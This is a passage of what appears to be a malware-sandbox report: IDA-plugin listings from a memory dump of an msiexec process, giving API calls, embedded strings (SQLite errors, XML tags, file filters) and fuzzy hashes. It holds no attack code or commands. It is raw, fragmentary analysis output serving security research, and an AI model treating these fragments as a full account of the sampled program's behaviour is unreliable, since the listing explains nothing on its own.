                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2618321458-3614832568
                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AttributesFilefreememset
                      • String ID:
                      • API String ID: 2507021081-0
                      • Opcode ID: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                      • Opcode Fuzzy Hash: ea0ff07029848add1e185646dd88dbb6c2c853951c2e6fbb7239dcf5113ebac3
                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                      • malloc.MSVCRT ref: 00417524
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                      • free.MSVCRT ref: 00417544
                      • free.MSVCRT ref: 00417562
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                      • String ID:
                      • API String ID: 4131324427-0
                      • Opcode ID: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                      • Opcode Fuzzy Hash: eeddbaa8163b175ede4803737d515952d7f2f948772a4cc0436fa9d80e9c9619
                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                      APIs
                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                      • free.MSVCRT ref: 0041822B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: PathTemp$free
                      • String ID: %s\etilqs_$etilqs_
                      • API String ID: 924794160-1420421710
                      • Opcode ID: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                      • Opcode Fuzzy Hash: 264650abee42f12a8168c60520d94c93615684aca84a1282326acd03e30c5268
                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                      APIs
                      • memset.MSVCRT ref: 0040FDD5
                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 0040FE1F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                      • String ID: <%s>%s</%s>$</item>$<item>
                      • API String ID: 1775345501-2769808009
                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ErrorLastMessage_snwprintf
                      • String ID: Error$Error %d: %s
                      • API String ID: 313946961-1552265934
                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID:
                      • String ID: foreign key constraint failed$new$oid$old
                      • API String ID: 0-1953309616
                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                      APIs
                      Strings
                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                      • API String ID: 3510742995-272990098
                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                      APIs
                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                      • memset.MSVCRT ref: 0040C439
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                      • memset.MSVCRT ref: 0040C4D0
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                      • String ID:
                      • API String ID: 1265369119-0
                      • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                      • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                      APIs
                      • memset.MSVCRT ref: 0044A6EB
                      • memset.MSVCRT ref: 0044A6FB
                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                      • free.MSVCRT ref: 0040E9D3
                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@$free
                      • String ID:
                      • API String ID: 2241099983-0
                      • Opcode ID: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                      • Opcode Fuzzy Hash: 2810039f6bc4ad30ad174465d1322529e8fb666e9e7d33f144de14c935b4fe95
                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 00417497
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                      • malloc.MSVCRT ref: 004174BD
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                      • free.MSVCRT ref: 004174E4
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                      • String ID:
                      • API String ID: 4053608372-0
                      • Opcode ID: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                      • Opcode Fuzzy Hash: 29219c5ddddbff2dbf9aa78c0a5be21ddae927893e5f94b27af47ce0abc09f40
                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                      APIs
                      • GetParent.USER32(?), ref: 0040D453
                      • GetWindowRect.USER32(?,?), ref: 0040D460
                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                      • memset.MSVCRT ref: 004450CD
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                      • String ID:
                      • API String ID: 1471605966-0
                      • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                      • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                      APIs
                      • wcscpy.MSVCRT ref: 0044475F
                      • wcscat.MSVCRT ref: 0044476E
                      • wcscat.MSVCRT ref: 0044477F
                      • wcscat.MSVCRT ref: 0044478E
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                      • String ID: \StringFileInfo\
                      • API String ID: 102104167-2245444037
                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                      APIs
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _memicmpwcslen
                      • String ID: @@@@$History
                      • API String ID: 1872909662-685208920
                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                      APIs
                      • memset.MSVCRT ref: 004100FB
                      • memset.MSVCRT ref: 00410112
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 00410141
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_snwprintf_wcslwrwcscpy
                      • String ID: </%s>
                      • API String ID: 3400436232-259020660
                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                      APIs
                      • memset.MSVCRT ref: 0040D58D
                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ChildEnumTextWindowWindowsmemset
                      • String ID: caption
                      • API String ID: 1523050162-4135340389
                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                      APIs
                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                      • String ID: MS Sans Serif
                      • API String ID: 210187428-168460110
                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ClassName_wcsicmpmemset
                      • String ID: edit
                      • API String ID: 2747424523-2167791130
                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                      APIs
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                      • String ID: SHAutoComplete$shlwapi.dll
                      • API String ID: 3150196962-1506664499
                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                      • Opcode Fuzzy Hash: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                      APIs
                      • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                      • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                      • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                      • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                      • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memcmp
                      • String ID:
                      • API String ID: 3384217055-0
                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                      APIs
                      Memory Dump Source
